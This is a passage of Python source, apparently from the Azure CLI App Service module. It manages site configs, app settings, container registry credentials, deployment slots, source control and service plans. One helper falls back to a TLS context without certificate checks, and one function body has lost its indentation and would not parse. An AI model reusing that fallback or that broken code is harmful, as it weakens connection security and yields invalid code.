    """Return the base64-decoded multicontainer config bytes from linux_fx_version."""
    from base64 import b64decode
    linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
    if not linux_fx_version.startswith(tuple(MULTI_CONTAINER_TYPES)):
        raise CLIError("Cannot decode config that is not one of the"
                       " following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
    encoded = linux_fx_version.split('|')[1]
    return b64decode(encoded.encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
    """Read a multicontainer config from a URL or local path; return it base64-encoded."""
    from base64 import b64encode
    if url_validator(file_name):
        response = urlopen(file_name, context=_ssl_context())
        config_file_bytes = response.read()
    else:
        with open(file_name, 'rb') as f:
            config_file_bytes = f.read()
    # Decode base64 encoded byte array into string
    return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
                        windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
                        python_version=None, net_framework_version=None,
                        java_version=None, java_container=None, java_container_version=None,
                        remote_debugging_enabled=None, web_sockets_enabled=None,
                        always_on=None, auto_heal_enabled=None,
                        use32_bit_worker_process=None,
                        min_tls_version=None,
                        http20_enabled=None,
                        app_command_line=None,
                        ftps_state=None,
                        generic_configurations=None):
    """Update site configuration properties.

    Parameter names after (cmd, resource_group_name, name) intentionally match
    SiteConfig attribute names 1:1 — they are copied onto the model by
    reflection below, so any signature change must keep that mapping intact.
    """
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
    if linux_fx_version:
        # a single-container docker image implies no persistent /home storage;
        # any other fx-version removes that override
        if linux_fx_version.strip().lower().startswith('docker|'):
            update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
        else:
            delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
    if pre_warmed_instance_count is not None:
        pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
                                                               min_val=0, max_val=20)
    import inspect
    frame = inspect.currentframe()
    # these flags arrive as 'true'/'false' strings and are converted to booleans
    bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
                  'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
    int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # skip cmd/resource_group_name/name; copy every supplied arg onto the model
    for arg in args[3:]:
        if arg in int_flags and values[arg] is not None:
            values[arg] = validate_and_convert_to_int(arg, values[arg])
        if arg != 'generic_configurations' and values.get(arg, None):
            setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    generic_configurations = generic_configurations or []
    # generic configurations can be JSON objects or simple KEY=VALUE strings
    result = {}
    for s in generic_configurations:
        try:
            result.update(get_json_object(s))
        except CLIError:
            config_name, value = s.split('=', 1)
            result[config_name] = value
    for config_name, value in result.items():
        setattr(configs, config_name, value)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove the named app settings and drop them from the slot-sticky list."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_names = slot_cfg_names.app_setting_names
    sticky_changed = False
    for setting_name in setting_names:
        app_settings.properties.pop(setting_name, None)
        if sticky_names and setting_name in sticky_names:
            sticky_names.remove(setting_name)
            sticky_changed = True
    if sticky_changed:
        # persist the trimmed slot-sticky list only when it actually changed
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
    """Remove one Azure-storage mount by its custom id, keeping slot-sticky names in sync."""
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    azure_storage_accounts.properties.pop(custom_id, None)
    sticky_names = slot_cfg_names.azure_storage_config_names
    if sticky_names and custom_id in sticky_names:
        sticky_names.remove(custom_id)
        # persist the trimmed slot-sticky list only when it actually changed
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts.properties,
                                         slot, client)
    return result.properties
def _ssl_context():
    """Build the SSL context used for urlopen calls.

    Fix: the original called ``sys.platform.system()`` — ``sys.platform`` is a
    plain str with no ``system()`` method, so the Windows Cloud Shell branch
    raised AttributeError. The OS check belongs to the ``platform`` module.

    Older Pythons (<3.4) and Windows Cloud Shell lack a usable default cert
    store, so fall back to an unverified context there.
    """
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Convert a settings dict into the CLI's list-of-dicts shape, masking credentials."""
    sticky_names = slot_cfg_names or []
    return [{'name': key,
             'value': app_settings[key],
             'slotSetting': key in sticky_names}
            for key in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Add/update connection strings; names given via slot_settings become slot-sticky."""
    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    for name_value in settings + slot_settings:
        # split at the first '=' only; a connection string name cannot contain '='
        conn_string_name, value = name_value.split('=', 1)
        if value[0] in ("'", '"'):  # strip the quotes used as separators
            value = value[1:-1]
        conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
                                                                            type=connection_string_type)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings.properties, slot, client)
    if slot_settings:
        # register the new names as slot-sticky
        new_sticky_names = [entry.split('=', 1)[0] for entry in slot_settings]
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        existing_sticky = slot_cfg_names.connection_string_names or []
        slot_cfg_names.connection_string_names = existing_sticky + new_sticky_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove the named connection strings and drop them from the slot-sticky list."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_names = slot_cfg_names.connection_string_names
    sticky_changed = False
    for setting_name in setting_names:
        conn_strings.properties.pop(setting_name, None)
        if sticky_names and setting_name in sticky_names:
            sticky_names.remove(setting_name)
            sticky_changed = True
    if sticky_changed:
        # persist the trimmed slot-sticky list only when it actually changed
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings.properties, slot, client)
# App settings that together define the site's container configuration.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values are masked before being shown to the user.
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
    """Update the container configuration (registry, image, multicontainer config) of an app.

    Registry details are stored as app settings; the image / multicontainer
    config goes into linux_fx_version. Returns the container-related app
    settings with credentials masked.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    # best-effort ACR credential lookup when the registry is an azurecr.io one
    # and the caller supplied no credentials
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        # registry name is the first label of the host (or of the path if no scheme was given)
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
        except Exception as ex:  # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex)  # consider throw if needed
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage:  # pylint: disable=line-too-long
        update_app_settings(cmd, resource_group_name, name, settings, slot)
        # re-read so the return value reflects the persisted state
        settings = get_app_settings(cmd, resource_group_name, name, slot)
    if docker_custom_image_name is not None:
        _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
    # multicontainer config requires BOTH the file and its type
    if multicontainer_config_file and multicontainer_config_type:
        encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
        linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
        update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
    elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
                                          docker_custom_image_name=None, docker_registry_server_user=None,
                                          docker_registry_server_password=None, slot=None):
    """Function-app variant: delegates without storage/multicontainer options."""
    return update_container_settings(cmd, resource_group_name, name,
                                     docker_registry_server_url=docker_registry_server_url,
                                     docker_custom_image_name=docker_custom_image_name,
                                     docker_registry_server_user=docker_registry_server_user,
                                     websites_enable_app_service_storage=None,
                                     docker_registry_server_password=docker_registry_server_password,
                                     multicontainer_config_type=None,
                                     multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
    """Look up admin credentials for the Azure Container Registry *registry_name*.

    Fix: compare registry names case-insensitively on BOTH sides — the name is
    parsed from a user-supplied registry URL and may carry mixed case, while the
    original compared ``item.name.lower()`` against the raw input and so could
    miss the registry entirely.

    Raises CLIError when the registry is ambiguous/missing or admin user is disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
    result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    wanted = registry_name.lower()
    result = [item for item in result if item.name.lower() == wanted]
    if not result or len(result) > 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(result[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if registry.admin_user_enabled:  # pylint: disable=no-member
        cred = client.list_credentials(resource_group_name, registry_name)
        return cred.username, cred.passwords[0].value
    raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                   "credentials or run 'az acr update -n {} --admin-enabled true' to enable "
                   "admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
    """Remove the container configuration from an app: clear its linux fx
    version, then delete the container-related app settings
    (CONTAINER_APPSETTING_NAMES)."""
    _delete_linux_fx_version(cmd, resource_group_name, name, slot)
    delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
    """Show the container-related app settings, with registry credentials masked."""
    current_settings = get_app_settings(cmd, resource_group_name, name, slot)
    container_settings = _filter_for_container_settings(cmd, resource_group_name, name, current_settings,
                                                        show_multicontainer_config, slot)
    return _mask_creds_related_appsettings(container_settings)
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
    """Show a function app's container settings (multi-container config does not apply)."""
    return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
                                   show_multicontainer_config=None, slot=None):
    """Return the container-related subset of *settings* as name/value dicts.

    The current fx version is appended as a synthetic DOCKER_CUSTOM_IMAGE_NAME
    entry; when *show_multicontainer_config* is truthy, the base64-decoded
    multi-container config is appended as well.
    """
    result = [entry for entry in settings if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
    if fx_version:
        result.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                       'value': fx_version})
        if show_multicontainer_config:
            decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
            result.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
                           'value': decoded_value})
    return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Blank out credential app settings (APPSETTINGS_TO_MASK) before display.

    Accepts either a dict of name->value or the list of {'name': ..., 'value': ...}
    dicts produced by get_app_settings/_filter_for_container_settings. The
    original membership test only worked for the dict shape, so list entries
    (the shape actually passed by show_container_settings) were never masked.
    """
    if isinstance(settings, dict):
        for key in [k for k in settings if k in APPSETTINGS_TO_MASK]:
            settings[key] = None
    else:
        for entry in settings:
            if entry.get('name') in APPSETTINGS_TO_MASK:
                entry['value'] = None
    return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Bind a custom hostname to a webapp or to one of its slots."""
    HostNameBinding = cmd.get_models('HostNameBinding')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp_name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    binding = HostNameBinding(location=site.location, site_name=site.name)
    if slot is not None:
        return client.web_apps.create_or_update_host_name_binding_slot(
            resource_group_name, site.name, hostname, binding, slot)
    return client.web_apps.create_or_update_host_name_binding(
        resource_group_name, site.name, hostname, binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Unbind a custom hostname from a webapp or one of its slots."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is not None:
        # NOTE: the slot variant takes (group, app, slot, hostname) -- argument
        # order differs from the non-slot call.
        return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
    return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
    """List hostname bindings, trimming each name to its last path segment."""
    bindings = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        binding.name = binding.name.rsplit('/', 1)[-1]
    return bindings
def get_external_ip(cmd, resource_group_name, webapp_name):
    """Return {'ip': <address>} for a webapp; logic ported from the Azure portal."""
    SslState = cmd.get_models('SslState')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    if not webapp.hosting_environment_profile:
        # Plain multi-tenant app: resolve its default hostname through DNS.
        return {'ip': _resolve_hostname_through_dns(webapp.default_host_name)}
    # App Service Environment: ask the ASE for its VIPs.
    address = client.app_service_environments.list_vips(
        resource_group_name, webapp.hosting_environment_profile.name)
    if address.internal_ip_address:
        ip_address = address.internal_ip_address
    else:
        ip_based = next((s for s in webapp.host_name_ssl_states
                         if s.ssl_state == SslState.ip_based_enabled), None)
        ip_address = ip_based.virtual_ip if ip_based else address.service_ip_address
    return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot for a webapp, optionally cloning configuration
    from *configuration_source* (the production app or another slot)."""
    Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp)
    site_config = get_site_configs(cmd, resource_group_name, webapp, None)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    if 'functionapp' in site.kind:
        raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
    slot_def = Site(server_farm_id=site.server_farm_id, location=site.location)
    slot_def.site_config = SiteConfig()
    # For Windows Container sites, seed the slot with the registry credentials
    # so container image validation can succeed during slot creation.
    if configuration_source and site_config.windows_fx_version:
        clone_from_prod = configuration_source.lower() == webapp.lower()
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                               'list_application_settings', src_slot)
        docker_keys = ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
                       "DOCKER_REGISTRY_SERVER_URL")
        seeded = [NameValuePair(name=key, value=value)
                  for key, value in app_settings.properties.items() if key in docker_keys]
        slot_def.site_config = SiteConfig(app_settings=seeded)
    poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
    result.name = result.name.split('/')[-1]
    return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
    """Create a deployment slot for a function app, optionally cloning
    configuration from *configuration_source*."""
    Site = cmd.get_models('Site')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' function app doesn't exist".format(name))
    slot_def = Site(server_farm_id=site.server_farm_id, location=site.location)
    poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
    created = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
    # Trim 'app/slot' down to just the slot name for display.
    created.name = created.name.split('/')[-1]
    return created
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
    """Copy site config, app settings and connection strings from
    *configuration_source* into *slot*, excluding slot-sticky settings so they
    do not propagate across slots."""
    clone_from_prod = configuration_source.lower() == webapp.lower()
    src_slot = None if clone_from_prod else configuration_source
    site_config = get_site_configs(cmd, resource_group_name, webapp, src_slot)
    _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                            'update_configuration', slot, site_config)
    # Slot creation does not clone app settings / connection strings, so copy
    # them here while stripping anything marked as a slot (sticky) setting.
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                           'list_application_settings',
                                           src_slot)
    for sticky_name in slot_cfg_names.app_setting_names or []:
        app_settings.properties.pop(sticky_name, None)
    connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                                 'list_connection_strings',
                                                 src_slot)
    for sticky_name in slot_cfg_names.connection_string_names or []:
        connection_strings.properties.pop(sticky_name, None)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_application_settings',
                                app_settings.properties, slot, client)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_connection_strings',
                                connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, cd_app_type=None,
                          app_working_dir=None, nodejs_task_runner=None, python_framework=None,
                          python_version=None, cd_account_create=None, cd_project_url=None, test=None,
                          slot_swap=None, private_repo_username=None, private_repo_password=None):
    """Configure source-control based deployment for a webapp.

    Two mutually exclusive modes:
      * VSTS continuous delivery, when cd_project_url is given (handled by
        VstsContinuousDeliveryProvider); the cd_* / test / slot_swap arguments
        apply only here.
      * Plain Kudu/SCM source control otherwise (git or Mercurial, optionally
        manual integration, with a GitHub token cached subscription-wide).
    :raises CLIError: on invalid argument combinations or provider errors.
    """
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    if cd_project_url:
        # VSTS continuous-delivery path.
        # Add default values
        cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
        python_framework = 'Django' if python_framework is None else python_framework
        python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(resource_group_name)
        vsts_provider = VstsContinuousDeliveryProvider()
        cd_app_type_details = {
            'cd_app_type': cd_app_type,
            'app_working_dir': app_working_dir,
            'nodejs_task_runner': nodejs_task_runner,
            'python_framework': python_framework,
            'python_version': python_version
        }
        try:
            status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
                                                             branch, git_token, slot_swap, cd_app_type_details,
                                                             cd_project_url, cd_account_create, location, test,
                                                             private_repo_username, private_repo_password, webapp_list)
        except RuntimeError as ex:
            raise CLIError(ex)
        logger.warning(status.status_message)
        return status
    # Non-VSTS path: reject arguments that only make sense with cd_project_url.
    non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
                       python_version, cd_account_create, test, slot_swap]
    if any(non_vsts_params):
        raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
                       'python_version, cd_account_create, test, slot_swap')
    from azure.mgmt.web.models import SiteSourceControl, SourceControl
    if git_token:
        # Cache the GitHub token at subscription level so the SCM site can pull.
        sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
        client.update_source_control('GitHub', sc)
    source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
                                       is_manual_integration=manual_integration,
                                       is_mercurial=(repository_type != 'git'))
    # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
    for i in range(5):
        try:
            poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                             'create_or_update_source_control',
                                             slot, source_control)
            return LongRunningOperation(cmd.cli_ctx)(poller)
        except Exception as ex:  # pylint: disable=broad-except
            import re
            ex = ex_handler_factory(no_throw=True)(ex)
            # for non server errors(50x), just throw; otherwise retry 4 times
            if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                raise
            logger.warning('retrying %s/4', i + 1)
            time.sleep(5)   # retry in a moment
def update_git_token(cmd, git_token=None):
    '''
    Update source control token cached in Azure app service. If no token is provided,
    the command will clean up existing token.
    '''
    from azure.mgmt.web.models import SourceControl
    client = web_client_factory(cmd.cli_ctx)
    # An empty token clears the cached one; the 'name' field is required by the
    # model but otherwise unused.
    source_control = SourceControl(name='not-really-needed', source_control_name='GitHub',
                                   token=git_token or '')
    return client.update_source_control('GitHub', source_control)
def show_source_control(cmd, resource_group_name, name, slot=None):
    """Show the source-control configuration of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
    """Delete the source-control configuration of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
    """Switch the app's SCM type to LocalGit and return its local git URL."""
    SiteConfigResource = cmd.get_models('SiteConfigResource')
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    site_config = SiteConfigResource(location=location)
    site_config.scm_type = 'LocalGit'
    if slot is not None:
        client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
                                                            site_config, slot)
    else:
        client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
    return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
    """Trigger a repository sync for an app configured with external integration."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:
        # Because of a bad API spec, the SDK raises even on HTTP 200/204;
        # swallow those and re-raise anything else.
        if ex.status_code not in (200, 204):
            raise ex
def list_app_service_plans(cmd, resource_group_name=None):
    """List app service plans, subscription-wide or within one resource group."""
    client = web_client_factory(cmd.cli_ctx)
    if resource_group_name is not None:
        plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
    else:
        # detailed=True enables querying "numberOfSites"
        plans = list(client.app_service_plans.list(detailed=True))
    for plan in plans:
        # prune a few useless fields
        del plan.geo_region
        del plan.subscription
    return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
                            app_service_environment=None, sku='B1', number_of_workers=None, location=None,
                            tags=None, no_wait=False):
    """Create an app service plan.

    :param is_linux: create a Linux (reserved) plan.
    :param hyper_v: create a Windows container (Hyper-V) plan; mutually
        exclusive with is_linux and unsupported inside an ASE.
    :param app_service_environment: name or resource id of an App Service
        Environment to host the plan; its location overrides --location.
    :raises CLIError: on conflicting flags or when the ASE cannot be found.
    """
    HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
        'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    _validate_asp_sku(app_service_environment, sku)
    if is_linux and hyper_v:
        raise CLIError('usage error: --is-linux | --hyper-v')
    client = web_client_factory(cmd.cli_ctx)
    if app_service_environment:
        if hyper_v:
            raise CLIError('Windows containers is not yet supported in app service environment')
        ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
        ase_def = HostingEnvironmentProfile(id=ase_id)
        ase_list = client.app_service_environments.list()
        ase_found = False
        # The plan must live in the same region as its ASE, so look the ASE up
        # (case-insensitively by id) and inherit its location.
        for ase in ase_list:
            if ase.id.lower() == ase_id.lower():
                location = ase.location
                ase_found = True
                break
        if not ase_found:
            raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
    else:  # Non-ASE
        ase_def = None
        if location is None:
            location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
                              per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
    return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
                       resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
    """Apply SKU and/or worker-count changes to an app service plan instance.

    Returns the (mutated) instance. When neither argument is supplied, a
    warning is emitted and the instance is returned unchanged.
    """
    if sku is None and number_of_workers is None:
        logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
    sku_def = instance.sku
    if sku is not None:
        normalized = _normalize_sku(sku)
        sku_def.tier = get_sku_name(normalized)
        sku_def.name = normalized
    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    instance.sku = sku_def
    return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
    """Update a function app's plan: SKU, worker count, and (Elastic Premium
    only) the maximum burst worker count.

    :raises CLIError: when --max-burst is used on a non-EP plan, or a flag
        value is out of its 0-20 range.
    """
    if max_burst is not None:
        if not is_plan_elastic_premium(cmd, instance):
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
        instance.maximum_elastic_worker_count = max_burst
    if number_of_workers is not None:
        # Validate BEFORE applying anything so an out-of-range value leaves the
        # instance untouched (the original applied the raw value first via an
        # extra update_app_service_plan call, then validated).
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
                                                       number_of_workers, min_val=0, max_val=20)
    return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Return the app's backup configuration.

    Any service failure is deliberately surfaced as a generic 'not found'
    CLIError, since a missing configuration is the common cause.
    """
    try:
